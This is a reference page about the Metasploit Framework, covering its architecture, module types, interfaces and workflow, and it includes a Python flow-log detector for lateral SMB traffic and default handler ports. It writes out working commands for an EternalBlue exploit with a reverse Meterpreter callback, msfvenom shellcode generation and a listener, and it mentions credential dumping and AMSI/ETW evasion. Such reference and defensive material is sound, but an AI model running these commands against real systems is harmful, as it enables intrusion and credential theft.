OFFSITE.DARK

Metasploit Framework

Overview

Metasploit Framework (MSF) is a Ruby-based modular exploitation platform. Rapid7 maintains commercial Metasploit Pro; the open-source Framework drives msfconsole, msfvenom, and thousands of community modules.

Runtime architecture: msfconsole REPL → module loader (mixins for exploit, payload, encoder) → Rex library (network protocol primitives) → optional PostgreSQL db for workspace persistence (hosts, services, creds, loot, sessions).

Typical workflow: `db_nmap` or import → `search type:exploit platform:windows cve:2021` → `use exploit/...` → `set RHOSTS`, `set payload`, `set LHOST` → `check` (if supported) → `run` → `sessions -i` → `run post/multi/recon/...`.

Payload staging: a stager (small bootstrap) connects back and pulls the stage (full payload) over the wire. Meterpreter runs as a reflective DLL in memory, which avoids disk artifacts but leaves distinct network and API indicators. Encoders (`-e`) and evasion modules modify delivery; they are not magic AV bypass.

Module search supports grep-like filters: `search type:auxiliary name:smb`, `search cve:2024 rank:excellent`. `info` shows options, references, and compatible payloads. The `advanced` and `evasion` commands (also `show advanced` / `show evasion`) list rarely-needed tuning options.

Resource scripts (.rc) automate command sequences for CTFs and repeat engagements: `msfconsole -r autopwn.rc`. Armitage and the RPC API enable GUI and third-party orchestration.

Primary use cases

  • Exploit validation for CVEs with configurable targets and badchars
  • Payload generation via msfvenom for shellcode injection labs
  • Auxiliary scanning (SMB version, FTP anon, SMTP users) without exploitation
  • Post-exploitation credential harvest and pivot setup on Meterpreter sessions
  • Evasion module testing against AMSI/ETW in lab Windows hosts

Key commands

Initialize database and workspace

msfdb init && msfconsole -q -x 'workspace -a engagement; db_nmap -sV 10.0.0.0/24'

Search and run exploit

search cve:2017-0144 type:exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.5
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
run

msfvenom raw shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=4444 -f raw -o shell.bin

Handler for reverse payload

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set LPORT 4444
run -j

Notable modules / features

  • Module types: exploit, auxiliary, payload, encoder, nop, post, evasion
  • Meterpreter: hashdump, migrate, portfwd, route, kiwi, getsystem
  • msfvenom: -f formats (exe, elf, ps1, aspx, java), -x template injection
  • Plugins: db_autopwn, socket_filter, event systems
  • Integration with Nexpose/Nmap via db_* commands

Detection / defense notes

  • Monitor for Metasploit default payloads and certificate patterns
  • Segment lateral movement; block unexpected SMB/RPC from workstations
  • EDR signatures on Meterpreter reflective loading and common post modules
  • Network IDS for EternalBlue, Shellshock, and known exploit traffic
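A minimal flow-log check that turns the second and first bullets above into code. This is an added example, not Metasploit or Rapid7 code; the workstation subnet (10.0.1.0/24), the whitespace flow-record format and the sample records are constructed for the demonstration, and 4444 is Metasploit's default LPORT as used in the handler example earlier on this page.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample flow log (not a real capture): ts src sport dst dport proto
SAMPLE_FLOWS = """\
2024-05-01T10:00:01Z 10.0.1.15 51002 10.0.1.22 445 tcp
2024-05-01T10:00:03Z 10.0.1.15 51010 10.0.0.100 4444 tcp
2024-05-01T10:00:05Z 10.0.1.16 51500 10.0.5.10 443 tcp
2024-05-01T10:00:07Z 10.0.5.10 38800 10.0.1.16 445 tcp
2024-05-01T10:00:09Z 10.0.1.17 52000 10.0.1.18 135 tcp
"""

# Assumed network layout (hypothetical): 10.0.1.0/24 holds user workstations
WORKSTATION_NETS = [ipaddress.ip_network("10.0.1.0/24")]
LATERAL_PORTS = {445, 139, 135}   # SMB, NetBIOS session, RPC endpoint mapper
HANDLER_PORTS = {4444}            # Metasploit default LPORT (see handler example)

@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    dport: int
    reason: str

def in_any(ip, nets):
    """True if ip falls inside any of the given networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)

def analyze_flows(text):
    """Return one Alert per flow record that matches a detection rule."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _sport, dst, dport, proto = line.split()
        dport = int(dport)
        if proto != "tcp":
            continue
        # Rule 1: a workstation speaking SMB/RPC directly to another workstation.
        # Server-to-workstation SMB (e.g. management tooling) is deliberately not flagged.
        if (dport in LATERAL_PORTS and in_any(src, WORKSTATION_NETS)
                and in_any(dst, WORKSTATION_NETS)):
            alerts.append(Alert(ts, src, dst, dport, "workstation-to-workstation SMB/RPC"))
        # Rule 2: any host connecting to a default Metasploit handler port
        elif dport in HANDLER_PORTS:
            alerts.append(Alert(ts, src, dst, dport, "default handler port"))
    return alerts
```

Running `analyze_flows(SAMPLE_FLOWS)` yields three alerts: two workstation-to-workstation SMB/RPC flows and one connection to port 4444; the server-to-workstation 445 flow and the 443 flow are left alone.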

Related tools

  • Armitage: Metasploit GUI. Team server for collaborative red team operations.
  • Sploitus: Exploit and tool search engine. Aggregates Exploit-DB, GitHub PoCs, and Metasploit modules into one query interface.
  • Impacket: Python protocol implementations. secretsdump, psexec, getTGT, and SMB/Kerberos tooling for Windows networks.
  • Cobalt Strike: Commercial adversary simulation platform. Beacon C2, malleable profiles, team server. Licensed red-team software.

Modules

exploit

Deliver payloads against vulnerable services. Targets specific CVEs or logic bugs with configurable options (RHOST, RPORT, target index).

payload

Staged or single (stageless) shellcode. Meterpreter (reflective DLL), reverse/bind TCP, HTTPS, and custom stagers. msfvenom generates standalone binaries and shellcode.

auxiliary

Scanning, fuzzing, credential brute-force, and info gathering without delivering a payload. Example: auxiliary/scanner/smb/smb_version.

encoder

Transform shellcode to evade bad-char filters and naive AV. x86/shikata_ga_nai is the default polymorphic encoder.

nop

NOP sled generators for buffer overflow alignment. Platform-specific opcode sequences.

post

Post-exploitation on established sessions. Hash dump, pivot, persistence, privilege escalation modules.

evasion

Windows-specific bypass techniques for AMSI, AppLocker, and ETW prior to payload delivery.

Interfaces

msfconsole
Interactive REPL. search, use, set, run, sessions, routes. Tab completion and resource script execution (-r).
msfvenom
Payload generator CLI. -p payload, -f format (exe, elf, raw, ps1), encoders, badchars, iterations.
resource scripts
Automated command sequences (.rc files). Chain recon, exploit, and post modules for repeatable engagements.
msfdb / workspace
PostgreSQL-backed state. Hosts, services, creds, loot, and session history persist across runs.